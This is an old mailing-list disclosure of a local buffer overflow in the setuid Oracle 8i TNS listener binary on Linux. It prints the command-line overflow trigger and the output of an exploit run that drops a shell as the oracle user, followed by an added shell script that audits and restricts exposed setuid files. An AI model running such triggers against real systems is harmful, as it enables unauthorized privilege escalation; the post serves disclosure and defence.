Related information

  Buffer overflow in Oracle 8i TNS Listener

  Advisory CA-2001-16

  [COVERT-2001-04] Vulnerability in Oracle 8i TNS Listener

From: Kevin Finisterre <dotslash_(at)_snosoft.com>
Date: 02.04.2002
Subject: Happy Easter / April Fools from Snosoft (Oracle 8.1.5 tnslsnr)

This is meant to be an April Fools joke, but if you still use old Oracle
it's not too funny, I guess:

After I ate a few too many hard boiled eggs this weekend I decided to
install Oracle and play with it a little. Being poor, I didn't have 800
bones to shell out on Oracle 16i, so I had to settle for oldschool
Oracle 8i from this little mom and pop shop on my corner. They just
happened to have a copy that would run on Linux and it was only 50
bucks, so I bought it! No more than 10 minutes after the install I found
an issue... I figured that most anything I would have found would
already be public knowledge, or would have been patched up somewhere along
the way to the current product version. Well, from what I can tell this
is an unknown issue.

TNSLSNR for Linux: Version 8.1.5.0.0 - Production on 01-APR-02 11:46:53

[itchie@ghetto itchie]$ ls -al
/home/u01/app/oracle/product/8.1.5/bin/tnslsnr
-rwsr-s--x    1 oracle   oracle    4399723 Jun 11  1999
/home/u01/app/oracle/product/8.1.5/bin/tnslsnr

There were holes reported on the abuse of $ORACLE_HOME....
http://online.securityfocus.com/archive/1/140704
which tnslsnr had issues with, but these appeared patched on this
install, so I didn't bother trying to abuse env variables:

[dotslash@ghetto itchie]$ export ORACLE_HOME=`perl -e 'print "A" x
9000'`
[dotslash@ghetto itchie]$ /home/u01/app/oracle/product/8.1.5/bin/tnslsnr
(no result...exit normally)

The first abnormal thing I tried hit right on the money... a simple
cmdline b0f:
[dotslash@ghetto itchie]$
/home/u01/app/oracle/product/8.1.5/bin/tnslsnr
`perl -e 'print "A" x 9000'`
Segmentation fault

Of course I had to give one of my developers a quick ring and try to
harass him to stop molesting the Easter bunny and take a second to code
me up an exploit. Much obliged, "The Itch" took about 10 minutes
(literally) to come up with the following...

Happy Easter! and April Fools?!

[itchie@ghetto tmp]$ cc -o tnslsnrx tnslsnrx.c
[itchie@ghetto tmp]$ id
uid=507(itchie) gid=507(itchie) groups=507(itchie)
[itchie@ghetto tmp]$ ./tnslsnrx
Oracle tnslsrn 8.1.5
Vulnerability found by KF / http://www.snosoft.com
Coded by The Itch / http://www.promisc.org

Using return address: 0xbffffaf4
Using buffersize    : 2132
sh-2.05$ id
uid=515(oracle) gid=507(itchie) groups=507(itchie)

-KF
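The check a defender would want after reading the ls -al listing above, as an added example that is not part of the original post or of Oracle's own tooling: the mode shown on tnslsnr (-rwsr-s--x) is what turns a command-line overflow in the listener into a local privilege escalation to the oracle account, because any local user can execute the setuid binary. The functions below find setuid/setgid files under a given tree that "other" can execute, and optionally drop that execute bit so only the owner and its group keep access. It assumes POSIX sh with find(1), ls(1), awk(1) and chmod(1); the tree path is supplied by the caller, and the demonstration builds its own scratch files.

```shell
#!/bin/sh
# Added example, not code from the original post: audit a directory tree
# for setuid/setgid executables that "other" users can execute, the
# exposure shown by the -rwsr-s--x mode on tnslsnr above. Assumes POSIX
# sh, find(1), ls(1), awk(1) and chmod(1); $1 is the tree to audit.

# Print each setuid/setgid regular file under $1 that others can execute,
# one per line as "<mode> <owner> <group> <path>".
# -perm -4000 / -perm -2000: setuid / setgid bit set; -perm -001: o+x set.
audit_setuid_other_exec() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -perm -001 \
        -exec ls -ld {} \; | awk '{ print $1, $3, $4, $NF }'
}

# Count the findings so a script or a test can act on the number.
count_setuid_other_exec() {
    audit_setuid_other_exec "$1" | wc -l | tr -d ' '
}

# Remediate by dropping the "other" execute bit. The owner and the
# owning group (the DBA group, in Oracle's layout) keep their access,
# so legitimate administrators still run the binary.
restrict_setuid_other_exec() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -perm -001 \
        -exec chmod o-x {} \;
}

# Constructed demonstration: a scratch tree with one exposed file
# (mode 6711, like the tnslsnr listing) and one already restricted
# (mode 6710). Prints the finding count before and after remediation.
demo_setuid_audit() {
    tmp=$(mktemp -d)
    : > "$tmp/exposed";    chmod 6711 "$tmp/exposed"
    : > "$tmp/restricted"; chmod 6710 "$tmp/restricted"
    before=$(count_setuid_other_exec "$tmp")
    restrict_setuid_other_exec "$tmp"
    after=$(count_setuid_other_exec "$tmp")
    rm -rf "$tmp"
    echo "$before $after"   # prints "1 0"
}
```

Run audit_setuid_other_exec against the Oracle installation root (the /home/u01/app/oracle/product/8.1.5 tree in the post) to list every binary in the same position as tnslsnr; restrict_setuid_other_exec is the permission change to apply where a listener or other setuid tool only needs to be run by the software owner and the DBA group. The audit is a detection for this exposure class, not a patch for the overflow itself.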
